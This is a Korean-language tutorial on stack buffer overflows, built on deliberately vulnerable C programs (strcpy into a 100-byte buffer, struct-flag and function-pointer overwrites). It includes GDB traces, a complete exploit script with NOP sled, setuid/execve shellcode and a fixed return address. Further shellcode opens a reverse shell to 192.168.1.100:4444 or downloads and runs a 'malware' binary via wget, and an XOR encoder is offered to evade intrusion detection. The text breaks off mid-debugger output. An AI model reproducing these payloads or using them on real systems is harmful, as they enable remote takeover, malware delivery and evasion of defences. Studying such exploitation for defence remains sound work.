버퍼 오버플로우 취약점 심층 분석(상편): 원리부터 실제 활용까지

버퍼 오버플로우 기본 원리

버퍼 오버플로우란 무엇인가?

버퍼 오버플로우는 프로그램이 고정된 크기의 버퍼에 용량을 초과하는 데이터를 기록할 때 발생하는 일반적인 소프트웨어 보안 취약점입니다. 이러한 취약점은 다음을 유발할 수 있습니다.

메모리 손상: 인접한 메모리 영역을 덮어씀
프로그램 충돌: 프로그램의 정상적인 실행 흐름을 파괴함
코드 실행: 공격자가 프로그램의 제어권을 획득할 수 있음

C언어의 메모리 레이아웃

C 프로그램에서 메모리는 일반적으로 다음과 같은 몇 가지 영역으로 나뉩니다.

text

고주소
+------------------+
|       스택 영역      |  ← 함수 호출, 지역 변수
|       ↓         |
+------------------+
|       ...       |
+------------------+
|       ↑         |
|      힙 영역       |  ← 동적 메모리 할당
+------------------+
| BSS영역(초기화되지 않음) |
+------------------+
| Data영역(초기화됨)   |
+------------------+
|     코드 영역      |
+------------------+
저주소

스택 프레임 구조

함수가 호출될 때마다 스택에 스택 프레임이 생성됩니다.

text

고주소
+------------------+
|    함수 매개변수     |
+------------------+
|    리턴 주소       |  ← 주요 공격 대상
+------------------+
|    저장된 EBP     |
+------------------+
|    지역 변수       |  ← 버퍼 위치
+------------------+
저주소

버퍼 오버플로우가 발생하면 데이터가 리턴 주소를 덮어써 프로그램 실행 흐름을 제어할 수 있습니다.

취약 코드 분석

대상 프로그램 코드

c
#include <stdio.h>
#include <string.h>

int copy(char *str) {
    char buffer[100];        // 100바이트의 지역 버퍼
    // unsafe!
    strcpy(buffer, str);     // 위험한 문자열 복사 연산
    return 0;               // 리턴 값 추가
}

int main(int argc, char *argv[]) {
    copy(argv[1]);          // 명령줄 매개변수를 copy 함수에 전달
    return 0;
}

취약점 분석

이 간단한 C 프로그램에는 전형적인 버퍼 오버플로우 취약점이 포함되어 있습니다.

취약점: strcpy(buffer, str) 함수는 원본 문자열의 길이를 검사하지 않음
버퍼 크기: buffer 배열은 100바이트만 존재함
공격 벡터: argv[1]이 100바이트를 초과하면 오버플로우가 발생함
영향 범위: 오버플로우된 데이터는 스택의 다른 데이터, 리턴 주소를 덮어씀

메모리 레이아웃 분석

copy 함수가 호출될 때 스택의 레이아웃은 다음과 같습니다.

text

고주소
+------------------+
|   argv[1] 포인터   |  ← main 함수의 매개변수
+------------------+
|   copy 리턴 주소   |  ← 공격 대상!
+------------------+
|   저장된 EBP      |
+------------------+
|   buffer[99]     |
|   buffer[98]     |
|      ...         |  ← 100바이트 버퍼
|   buffer[1]      |
|   buffer[0]      |  ← ESP가 가리키는 부근
+------------------+
저주소

입력 데이터가 100바이트를 초과하면 초과된 데이터는 저장된 EBP와 리턴 주소를 덮어씁니다.

확장된 취약점 예시

버퍼 오버플로우의 다양성을 더 잘 이해하기 위해 다른 유형의 독창적인 취약점 예시를 살펴보겠습니다. 이러한 예시는 실제 CVE 취약점과 유사한 공격 패턴을 가지고 있습니다.

예시 2: 사용자 인증 시스템 취약점 (CVE-2024-28219 패턴 유사)

c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

typedef struct {
    char username[32];
    char password[32]; 
    int is_admin;
} UserCredentials;

int authenticate_user(const char* user_input, const char* pass_input) {
    UserCredentials creds;
    creds.is_admin = 0;  // 기본적으로 관리자 권한 없음
    
    // 위험한 문자열 복사 - is_admin 필드를 덮어쓸 수 있음
    strcpy(creds.username, user_input);
    strcpy(creds.password, pass_input);
    
    printf("사용자 이름: %s\n", creds.username);
    printf("관리자 권한: %s\n", creds.is_admin ? "있음" : "없음");
    
    return creds.is_admin;
}

int main(int argc, char *argv[]) {
    if (argc != 3) {
        printf("사용법: %s <사용자 이름> <비밀번호>\n", argv[0]);
        return 1;
    }
    
    if (authenticate_user(argv[1], argv[2])) {
        printf("🔓 관리자 권한 획득!\n");
        system("/bin/sh");
    } else {
        printf("❌ 인증 실패\n");
    }
    
    return 0;
}

취약점 분석:

구조체 레이아웃: username과 password 필드는 is_admin 필드 바로 옆에 위치함
오버플로우 지점: 너무 긴 사용자 이름은 is_admin 필드를 덮어쓸 수 있음, CVE-2024-28219의 strcpy 경계 검사 누락과 유사
공격 효과: is_admin을 0에서 0이 아닌 값으로 덮어써 관리자 권한을 획득함
실제 대응: 이러한 취약점은 인증 시스템에서 흔하며, 공격자는 입력 길이를 정확하게 제어하여 중요한 플래그 비트를 수정함

예시 3: 네트워크 데이터 처리 취약점 (CVE-2023-6549 패턴 유사)

c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

typedef struct {
    uint32_t packet_length;
    char data_buffer[256];
    void (*process_callback)(char*);
} NetworkPacket;

void safe_handler(char* data) {
    printf("안전한 처리: %s\n", data);
}

void dangerous_handler(char* data) {
    printf("🚨 위험한 처리 함수가 호출됨!\n");
    system(data);
}

int process_network_data(const char* raw_data, uint32_t length) {
    NetworkPacket packet;
    packet.process_callback = safe_handler;  // 기본적으로 안전한 처리 함수
    
    printf("길이가 %u인 데이터 패킷 처리\n", length);
    
    // 잠재적인 정수 오버플로우 및 버퍼 오버플로우
    if (length > 0 && length < 512) {  // 안전해 보이는 검사
        memcpy(packet.data_buffer, raw_data, length);
        packet.process_callback(packet.data_buffer);
    }
    
    return 0;
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("사용법: %s <데이터>\n", argv[0]);
        return 1;
    }
    
    uint32_t data_len = strlen(argv[1]);
    process_network_data(argv[1], data_len);
    
    return 0;
}

취약점 분석:

함수 포인터 덮어쓰기: 너무 긴 데이터는 process_callback 함수 포인터를 덮어쓸 수 있음
길이 검사 우회: 부호 없는 정수 비교는 우회될 수 있음, CVE-2022-0185의 정수 언더플로우와 유사
공격 벡터: 정교하게 구성된 입력은 함수 포인터를 dangerous_handler로 가리키도록 할 수 있음
실제 대응: 이 패턴은 네트워크 프로토콜 처리에서 흔하며, CVE-2023-6549는 유사한 방식으로 NetScaler의 버퍼 오버플로우를 발생시킴

컴파일 설정 및 환경 준비

컴파일 매개변수 해석

bash

# 취약 프로그램 컴파일
gcc -m32 -std=c99 -g -fno-stack-protector -z execstack -no-pie -o vul vul.c

각 컴파일 매개변수의 역할:

-m32: 32비트 실행 파일 생성, 메모리 주소 계산 간소화
-std=c99: C99 표준으로 컴파일
-g: 디버깅 정보 포함, GDB 디버깅 용이
-fno-stack-protector: 스택 보호 메커니즘(canary) 비활성화
-z execstack: 스택 영역 실행 허용, shellcode 실행 가능
-no-pie: 위치 독립 실행 파일 비활성화, 프로그램 로드 주소 고정

시스템 보안 메커니즘 구성

bash
# 주소 공간 무작위 배치(ASLR) 비활성화
root@softsec2:/home/toor/sample# echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0

ASLR(Address Space Layout Randomization):

일반적으로 프로그램이 실행될 때마다 메모리 주소가 무작위로 배치됨
ASLR을 비활성화하면 스택 주소, 힙 주소, 라이브러리 주소가 예측 가능해짐
따라서 공격자는 점프 주소를 정확하게 계산할 수 있음

취약점 악용 과정

1단계: 오버플로우 지점 확인

python
#!/usr/bin/python3
# exploit_step1.py - 기본 오버플로우 테스트
import sys

# 112개의 'A' 문자 + 4개의 'B' 문자 전송
# 112바이트로 버퍼 채우고, 4바이트로 리턴 주소 덮어쓰기
sys.stdout.buffer.write(b'A' * 112 + b'B' * 4)

원리 해석:

112개의 'A': 100바이트 버퍼 + 12바이트 패딩(정렬 및 저장된 EBP) 채움
4개의 'B': 4바이트 리턴 주소 덮어쓰기
프로그램이 리턴을 시도할 때 0x42424242('BBBB'의 16진수 표현) 주소로 점프함

테스트 실행 결과

bash
# 공격 페이로드 생성
python3 exploit_step1.py > payload1

# 테스트 실행
./vul $(cat payload1)

성공하면 프로그램은 잘못된 주소 0x42424242로 점프를 시도하여 충돌합니다. 이는 프로그램 실행 흐름을 제어했음을 증명합니다.

text

(gdb) list
warning: Source file is more recent than executable.
1       #include <stdio.h>
2       #include <string.h>
3       int copy(char *str) {
4           char buffer[100];
5           // unsafe!
6           strcpy(buffer, str);
7       }
8       int main(int argc, char *argv[]) {
9           copy(argv[1]);
10          return 0;
(gdb) b 6
Breakpoint 1 at 0x8049187: file vul.c, line 6.
(gdb) run $(cat out_boom)
Starting program: /home/toor/sample/vul $(cat out_boom)
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, copy (str=0xffffdf42 'A' <repeats 112 times>, "BBBB") at vul.c:6
6           strcpy(buffer, str);
(gdb) n
7       }
(gdb) x/x $esp
0xffffdcd0:     0xf7ffd000
(gdb) x/40x $esp
0xffffdcd0:     0xf7ffd000      0x00000020      0x00000000      0x41414141
0xffffdce0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdcf0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdd00:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdd10:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdd20:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdd30:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdd40:     0x41414141      0x41414141      0x41414141      0x42424242
0xffffdd50:     0xffffdf00      0xf7fbe66c      0xf7fbeb10      0x080491b7
0xffffdd60:     0x00000001      0xffffdd80      0xf7ffd020      0xf7da7519
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

1단계 테스트 성공 분석:

입력 데이터 확인: GDB는 전달된 문자열이 112개의 'A' 문자와 4개의 'B' 문자임을 보여줌
메모리 덮어쓰기 검증:
- 0xffffdcd0 - 0xffffdd40: 많은 0x41414141('AAAA')가 버퍼와 인접 메모리를 채움
- 0xffffdd40: 마지막 4바이트가 0x42424242('BBBB')로 덮어써짐, 함수의 리턴 주소 위치임
공격 효과 확인:
- 프로그램은 유효하지 않은 메모리 주소 0x42424242로 리턴을 시도함
- 시스템은 세그멘테이션 폴트(SIGSEGV)를 발생시키고 프로그램이 충돌함
- 프로그램 실행 흐름을 성공적으로 제어했음을 증명함

이 테스트는 다음을 확인했습니다.

오버플로우 지점의 정확한 위치: 112바이트 채우기 + 4바이트 리턴 주소 덮어쓰기
EIP 레지스터 값을 정확하게 제어할 수 있음
다음으로 0x42424242를 shellcode를 가리키는 실제 주소로 바꿀 수 있음

2단계: 공격 페이로드 구성

NOP 슬라이드 기법(NOP Sled)

NOP(No Operation)은 어셈블리 명령어(기계어: \x90)로, 실행 시 아무런 동작도 하지 않고 프로그램 카운터만 증가시킵니다. NOP 슬라이드는 공격 성공률을 높이는 기법입니다.

python
#!/usr/bin/python3
# exploit_final.py - 완전한 공격 페이로드
import sys

# NOP 슬라이드: 64바이트의 NOP 명령어
# 역할: 점프 주소가 정확하지 않더라도 shellcode로 "미끄러져" 들어갈 수 있음
nopsled = b'\x90' * 64

# Shellcode: root 권한을 얻고 쉘을 실행
shellcode = (
    b'\x31\xc0\x89\xc3\xb0\x17\xcd\x80' +   # setuid(0) 시스템 호출
    b'\x31\xd2\x52\x68\x6e\x2f\x73\x68' +   # "/bin/sh" 문자열 생성
    b'\x68\x2f\x2f\x62\x69\x89\xe3\x52' +   # 문자열 생성 계속
    b'\x53\x89\xe1\x8d\x42\x0b\xcd\x80'     # execve("/bin/sh") 시스템 호출
)

# 패딩 바이트 수 계산: 총 길이 112 - NOP 슬라이드 64 - shellcode 길이 32 = 16
padding = b'A' * (112 - 64 - 32)

# 리턴 주소: NOP 슬라이드 영역의 특정 위치로 점프
eip = b"\xF0\xDC\xFF\xFF"  # 스택의 한 주소

# 최종 페이로드 조립: NOP 슬라이드 + shellcode + 패딩 + 리턴 주소
sys.stdout.buffer.write(nopsled + shellcode + padding + eip)

Shellcode 분석

이 shellcode는 root 권한을 얻고 쉘을 실행하는 기능을 합니다.

setuid(0): 현재 프로세스의 사용자 ID를 0(root)으로 설정
문자열 생성: 스택에 "/bin/sh" 문자열 생성
execve("/bin/sh"): 쉘 프로그램 실행

기계어 해석:

\x31\xc0: xor eax, eax - EAX를 0으로 설정
\x89\xc3: mov ebx, eax - EBX를 0으로 설정
\xb0\x17: mov al, 0x17 - setuid 시스템 호출 번호(23)
\xcd\x80: int 0x80 - 시스템 호출 실행

확장된 Shellcode 분석

기본적인 쉘 실행 shellcode 외에도 공격자는 다른 유형의 페이로드를 사용할 수 있습니다. 다음은 몇 가지 일반적인 shellcode 변형입니다.

역방향 연결 Shellcode

이 shellcode는 공격자가 제어하는 서버에 연결을 생성합니다.

python
# 역방향 연결 shellcode (192.168.1.100:4444에 연결)
reverse_shell = (
    b'\x31\xc0\x31\xdb\x31\xc9\x31\xd2' +   # 레지스터 초기화
    b'\xb0\x66\xb3\x01\x51\x53\x6a\x02' +   # socket(AF_INET, SOCK_STREAM, 0)
    b'\x89\xe1\xcd\x80\x89\xc6\xb0\x66' +   # 시스템 호출 실행, 소켓 fd 저장
    b'\xb3\x03\x68\x64\x01\xa8\xc0\x66' +   # sockaddr 구조체 생성 (IP: 192.168.1.100)
    b'\x68\x11\x5c\x66\x53\x89\xe1\x6a' +   # 포트 4444, AF_INET
    b'\x10\x51\x56\x89\xe1\xcd\x80\x31' +   # connect() 시스템 호출
    b'\xc9\xb1\x03\xb0\x3f\x49\x89\xf3' +   # 반복 dup2() stdin/stdout/stderr 리다이렉션
    b'\xcd\x80\x75\xf8\x31\xc0\x50\x68' +   # 
    b'\x2f\x2f\x73\x68\x68\x2f\x62\x69' +   # "/bin/sh" 문자열 생성
    b'\x89\xe3\x50\x53\x89\xe1\xb0\x0b' +   # execve("/bin/sh")
    b'\xcd\x80'                             # 쉘 실행
)

역방향 연결 shellcode 분석:

소켓 생성: socket() 시스템 호출을 사용하여 TCP 연결 생성
공격자 연결: 지정된 IP 주소와 포트에 연결
IO 리다이렉션: stdin/stdout/stderr을 소켓으로 리다이렉션
쉘 실행: 쉘을 실행하여 원격 제어 가능하게 함

다운로드 실행 Shellcode

이 shellcode는 원격 서버에서 파일을 다운로드하여 실행합니다.

python
# 다운로드 실행 shellcode 예시
download_exec = (
    b'\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68' +   # execve 준비
    b'\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x2d\x63' +   # "/bin/sh", "-c" 매개변수
    b'\x00\x00\x89\xe6\x52\x68\x67\x65\x74\x20\x68' +   # "wget " 명령어
    b'\x77\x67\x65\x74\x20\x89\xe7\x52\x68\x74\x70' +   # wget 명령어 생성
    b'\x3a\x2f\x2f\x68\x68\x74\x74\x70\x3a\x2f\x2f' +   # "http://"
    b'\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31' +   # IP 주소 문자열
    b'\x30\x30\x2f\x6d\x61\x6c\x77\x61\x72\x65\x20' +   # "/malware "
    b'\x26\x26\x20\x63\x68\x6d\x6f\x64\x20\x2b\x78' +   # "&& chmod +x"
    b'\x20\x6d\x61\x6c\x77\x61\x72\x65\x20\x26\x26' +   # " malware &&"
    b'\x20\x2e\x2f\x6d\x61\x6c\x77\x61\x72\x65'        # " ./malware"
)

무파일 공격 Shellcode

파일을 남기지 않고 메모리에서 직접 코드를 실행합니다.

c
// 메모리 실행 shellcode 프레임워크
char memory_exec_template[] = 
    // 실행 가능한 메모리 할당
    "\x31\xc0\x31\xdb\x31\xc9\x31\xd2"     // 레지스터 초기화
    "\xb8\x7d\x00\x00\x00"                 // mmap 시스템 호출 번호
    "\x31\xdb"                             // addr = NULL
    "\xb9\x00\x10\x00\x00"                 // length = 4096
    "\xba\x07\x00\x00\x00"                 // prot = PROT_READ|WRITE|EXEC
    "\xbe\x22\x00\x00\x00"                 // flags = MAP_PRIVATE|ANONYMOUS
    "\xbf\xff\xff\xff\xff"                 // fd = -1
    "\x31\xed"                             // offset = 0
    "\xcd\x80"                             // int 0x80
    
    // 할당된 새 메모리에 후속 코드 복사
    "\x89\xc3"                             // mmap이 반환한 주소 저장
    "\x31\xc9"                             // 카운터 초기화
    "\xeb\x0c"                             // payload로 점프
    
    // 여기에 실제 payload 코드 삽입...
    ;

Shellcode 인코딩 기법

침입 탐지 시스템을 우회하기 위해 shellcode는 일반적으로 인코딩됩니다.

python
def xor_encode_shellcode(shellcode, key=0xAA):
    """간단한 XOR 인코딩 예시"""
    encoded = bytearray()
    for byte in shellcode:
        encoded.append(byte ^ key)
    
    # 디코딩 stub 추가
    decoder_stub = (
        b'\xeb\x11'                    # jmp short 0x13 (인코딩된 데이터 건너뛰기)
        b'\x5e'                        # pop esi (shellcode 주소 가져오기)
        b'\x31\xc9'                    # xor ecx, ecx (카운터 초기화)
        b'\xb1' + bytes([len(encoded)]) # mov cl, <length>
        b'\x80\x36' + bytes([key])     # xor byte ptr [esi], <key>
        b'\x46'                        # inc esi
        b'\xe2\xfb'                    # loop 디코딩 루프
        b'\xeb\x05'                    # jmp short +5 (디코딩된 shellcode로 점프)
        b'\xe8\xea\xff\xff\xff'       # call 디코더로 돌아가기
    )
    
    return decoder_stub + encoded

# 사용 예시
original_shellcode = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'
encoded = xor_encode_shellcode(original_shellcode)

Shellcode 탐지 및 방어

shellcode의 작동 원리를 이해하면 효과적인 방어 조치를 구현하는 데 도움이 됩니다.

특징 탐지

python
def detect_shellcode_patterns(data):
    """일반적인 shellcode 패턴 탐지"""
    suspicious_patterns = [
        b'\x31\xc0',          # xor eax, eax
        b'\xcd\x80',          # int 0x80
        b'\x2f\x62\x69\x6e', # "/bin"
        b'\x2f\x73\x68',      # "/sh"
        b'\x90' * 10,         # NOP sled
    ]
    
    detections = []
    for pattern in suspicious_patterns:
        if pattern in data:
            detections.append(f"의심스러운 패턴 탐지: {pattern.hex()}")
    
    return detections

GDB 디버깅 분석

중단점 설정 및 실행

bash

(gdb) list
warning: Source file is more recent than executable.
1       #include <stdio.h>
2       #include <string.h>
3       int copy(char *str) {
4           char buffer[100];
5           // unsafe!
6           strcpy(buffer, str);
7       }
8       int main(int argc, char *argv[]) {
9           copy(argv[1]);
10          return 0;

# strcpy 함수에 중단점 설정
(gdb) b 6
Breakpoint 1 at 0x8049187: file vul.c, line 6.

# 공격 페이로드로 프로그램 실행
(gdb) run $(python3 exploit_final.py)
Starting program: /home/toor/sample/vul $(python3 exploit_final.py)
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, copy (str=0xffffdf42 '\220' <repeats 64 times>, "\061\300\211\303\260\027\315\200\061\322Rhn/shh//bi\211\343RS\211\341\215B\v\315\200", 'A' <repeats 16 times>, "\360\334\377\377") at vul.c:6
6           strcpy(buffer, str);

# strcpy 연산 실행
(gdb) n
7       }

**디버깅 정보 해석**:
- GDB는 전달된 문자열 내용을 보여줌, NOP 슬라이드('\220'이 64번 반복)를 볼 수 있음
- shellcode의 기계어 코드가 그 뒤에 있음
- 그 다음 패딩 문자 'A'(16개)
- 마지막으로 리턴 주소 '\360\334\377\377'

### 메모리 상태 분석

```bash
# 스택 포인터 위치 확인
(gdb) x/x $esp      
0xffffdcd0:     0xf7ffd000

# 스택의 40개의 32비트 단어(160바이트) 확인
(gdb) x/40x $esp
0xffffdcd0:     0xf7ffd000      0x00000020      0x00000000      0x90909090
0xffffdce0:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffdcf0:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffdd00:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffdd10:     0x90909090      0x90909090      0x90909090      0xc389c031
0xffffdd20:     0x80cd17b0      0x6852d231      0x68732f6e      0x622f2f68
0xffffdd30:     0x52e38969      0x